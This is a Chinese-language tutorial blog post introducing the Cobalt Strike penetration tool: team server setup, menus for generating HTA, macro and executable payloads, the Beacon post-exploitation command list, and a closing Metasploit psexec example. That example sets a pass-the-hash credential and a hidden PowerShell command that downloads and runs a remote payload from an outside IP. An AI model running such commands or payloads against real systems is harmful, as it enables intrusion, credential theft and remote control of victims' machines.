玩英雄联盟的同学都知道,ad基本上都出无尽之刃的,因为他加暴击,加攻击,是个神器 而我们玩渗透的,cobaltstrick就是我们的无尽之刃;  无尽之刃 下面来简单介绍一下cobaltstrike Cobalt Strike是一款超级好用的渗透测试工具,拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等多种功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名工具,因此广受技术大佬的喜爱。 360评价APT-TOCS攻击尽管看起来已经接近APT水准的攻击能力,但并非更多依赖攻击团队自身的能力,而是依托商业的自动化攻击测试平台来达成。 Cobalt Strike是由美国Red Team开发,官网地址:https://www.cobaltstrike.com 客户端客户端在Windows、Linux、Mac下都可以运行 (需要配置好Java环境)。启动Cobalt Strike客户端,输入服务端的IP以及端口、连接密码,用户名可以任意设置。 Cobalt Strike分为客户端和服务端可分布式操作可以协同作战。但一定要架设在外网上,当然你得知道利用这款工具的目的,主要用于内网渗透以及APT攻击。 文件架构如下│ Scripts 用户安装的插件 │ Log 每天的日志 │ c2lint 检查profile的错误异常 │ cobaltstrike │ cobaltstrike.jar 客户端程序 │ icon.jpg LOGO │ license.pdf 许可证文件 │ readme.txt │ releasenotes.txt │ teamserver 服务端程序 │ update │ update.jar 更新程序 └─third-party 第三方工具,里面放的vnc dll 服务端尽量选择linux 安装步骤1、cd切换到Cobaltstrike目录下 2、执行命令 :teamserver.bat 8.8.8.8 stalker 8.8.8.8 为你的服务器外网IP,stalker为Coabltstrike的客户端密码,注意服务端要安装java环境,还必须配置环境变量; Applications #应用(显示受害者机器的应用信息) Credentials #凭证(通过hashdump或Mimikatz抓取过的密码都会储存在这里) Downloads #下载文件 Event Log #事件日志(主机上线记录以及团队协作聊天记录) Keystrokes #键盘记录 Proxy Pivots #代理模块 Screenshots #截图 Script Console #脚本控制台(可以加载各种脚本,增强功能https://github.com/rsmudge/cortana-scripts) Targets #显示目标主机 Web Log #Web日志
Applications #应用(显示受害者机器的应用信息) Credentials #凭证(通过hashdump或Mimikatz抓取过的密码都会储存在这里) Downloads #下载文件 Event Log #事件日志(主机上线记录以及团队协作聊天记录) Keystrokes #键盘记录 Proxy Pivots #代理模块 Screenshots #截图 Script Console #脚本控制台(可以加载各种脚本,增强功能https://github.com/rsmudge/cortana-scripts) Targets #显示目标主机 Web Log #Web日志
HTML Application #生成恶意的HTA木马文件 MS Office Macro #生成office宏病毒文件 Payload Generator #生成各种语言版本的payload USB/CD AutoPlay #生成利用自动播放运行的木马文件 Windows Dropper #捆绑器,能够对文档类进行捆绑 Windows Executable #生成可执行Payload Windows Executable(S) #把包含payload,Stageless生成可执行文件(包含多数功能)
0. Activity report #活动报告 1. Hosts report #主机报告 2. Indicators of Compromise #威胁报告 3. Sessions report #会话报告 4. Social engineering report #社会工程学报告 5. Tactics, Techniques, and Procedures #策略、技巧和程序 Reset Data #重置数据 Export Data #导出数据
Beacon右键目标interact来使用Beacon,用它来执行各种命令。 beacon> help
Beacon Commands ===============
Command Description ------- ----------- argue 进程参数欺骗 blockdlls 阻止子进程加载非Microsoft DLL browserpivot 注入受害者浏览器进程 bypassuac 绕过UAC提升权限 cancel 取消正在进行的下载 cd 切换目录 checkin 强制让被控端回连一次 clear 清除beacon内部的任务队列 connect Connect to a Beacon peer over TCP covertvpn 部署Covert VPN客户端 cp 复制文件 dcsync 从DC中提取密码哈希 desktop 远程桌面(VNC) dllinject 反射DLL注入进程 dllload 使用LoadLibrary将DLL加载到进程中 download 下载文件 downloads 列出正在进行的文件下载 drives 列出目标盘符 elevate 使用exp execute 在目标上执行程序(无输出) execute-assembly 在目标上内存中执行本地.NET程序 exit 终止beacon会话 getprivs Enable system privileges on current token getsystem 尝试获取SYSTEM权限 getuid 获取用户ID hashdump 转储密码哈希值 help 帮助 inject 在注入进程生成会话 jobkill 结束一个后台任务 jobs 列出后台任务 kerberos_ccache_use 从ccache文件中导入票据应用于此会话 kerberos_ticket_purge 清除当前会话的票据 kerberos_ticket_use Apply 从ticket文件中导入票据应用于此会话 keylogger 键盘记录 kill 结束进程 link Connect to a Beacon peer over a named pipe logonpasswords 使用mimikatz转储凭据和哈希值 ls 列出文件 make_token 创建令牌以传递凭据 mimikatz 运行mimikatz mkdir 创建一个目录 mode dns 使用DNS A作为通信通道(仅限DNS beacon) mode dns-txt 使用DNS TXT作为通信通道(仅限D beacon) mode dns6 使用DNS AAAA作为通信通道(仅限DNS beacon) mode http 使用HTTP作为通信通道 mv 移动文件 net net命令 note 备注 portscan 进行端口扫描 powerpick 通过Unmanaged PowerShell执行命令 powershell 通过powershell.exe执行命令 powershell-import 导入powershell脚本 ppid Set parent PID for spawned post-ex jobs ps 显示进程列表 psexec Use a service to spawn a session on a host psexec_psh Use PowerShell to spawn a session on a host psinject 在特定进程中执行PowerShell命令 pth 使用Mimikatz进行传递哈希 pwd 当前目录位置 reg Query the registry rev2self 恢复原始令牌 rm 删除文件或文件夹 rportfwd 端口转发 run 在目标上执行程序(返回输出) runas 以其他用户权限执行程序 runasadmin 在高权限下执行程序 runu Execute a program under another PID screenshot 屏幕截图 setenv 设置环境变量 shell 执行cmd命令 shinject 将shellcode注入进程 shspawn 启动一个进程并将shellcode注入其中 sleep 设置睡眠延迟时间 socks 启动SOCKS4代理 socks stop 停止SOCKS4 spawn Spawn a session spawnas Spawn a session as another user spawnto Set executable to spawn processes into spawnu Spawn a session under another PID ssh 使用ssh连接远程主机 ssh-key 使用密钥连接远程主机 steal_token 从进程中窃取令牌 timestomp 将一个文件的时间戳应用到另一个文件 unlink Disconnect from parent Beacon upload 上传文件 wdigest 使用mimikatz转储明文凭据 winrm 使用WinRM横向渗透 wmi 使用WMI横向渗透
AccessDump Hashes #获取hash Elevate #提权 Golden Ticket #生成黄金票据注入当前会话 Make token #凭证转换 Run Mimikatz #运行 Mimikatz Spawn As #用其他用户生成Cobalt Strike侦听器
ExploreBrowser Pivot #劫持目标浏览器进程 Desktop(VNC) #桌面交互 File Browser #文件浏览器 Net View #命令Net View Port Scan #端口扫描 Process List #进程列表 Screenshot #截图
利用MSF模块上线Beacon shell当通过其它方式拿到了目标内网中某台Windows机器的本地管理员明文密码或hash时,可利用Metasploit下auxiliary/admin/smb/psexec_command模块,直接上线指定目标机器的Beacon shell。(前提目标即可出网) 先利用CobalStrike生成上线Beacon的powershell。 本地启动Metasploit,挂上代理,设置psexec_command模块参数。 msf5 > setg Proxies socks4/5:ip:port
msf5 > use auxiliary/admin/smb/psexec_command
msf5 > set rhosts 192.168.144.0/24
msf5 > set threads 10
msf5 > set smbuser administrator
msf5 > set smbpass aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4 #明文、密文均可
msf5 > set command powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://149.28.xx.xx:80/a'))" #上线CS的powershell,目标机存在杀软需考虑
msf5 > run
你可能已经尝试过在网络及一些安全社区寻找文章或视频资源,最终都会发现:基础入门的资源很多,质量良莠不齐,自学的效率并不高。 而作为一个萌新小白,在学习过程中可能会遇到各种各样奇奇怪怪的情况。如果你想更深入的掌握知识点,建议你系统学习,效率更高。 如果你想要进入网络安全这个行业,求一份网络安全相关的岗位,推荐你先了解下网络安全行业内热门的岗位以及对应的技能,了解下各大热门岗位的进阶路线,更重要的是了解下“前辈们”对于网络安全的学习技巧和经验,助你少走弯路! 6月2日,我们将邀请一线网安大咖,进入直播间,跟大家聊一聊网安求职那些事儿,如果你想了解网络安全行业的岗位进阶之路,欢迎大家私信回复【直播】获取本期直播链接哦~
|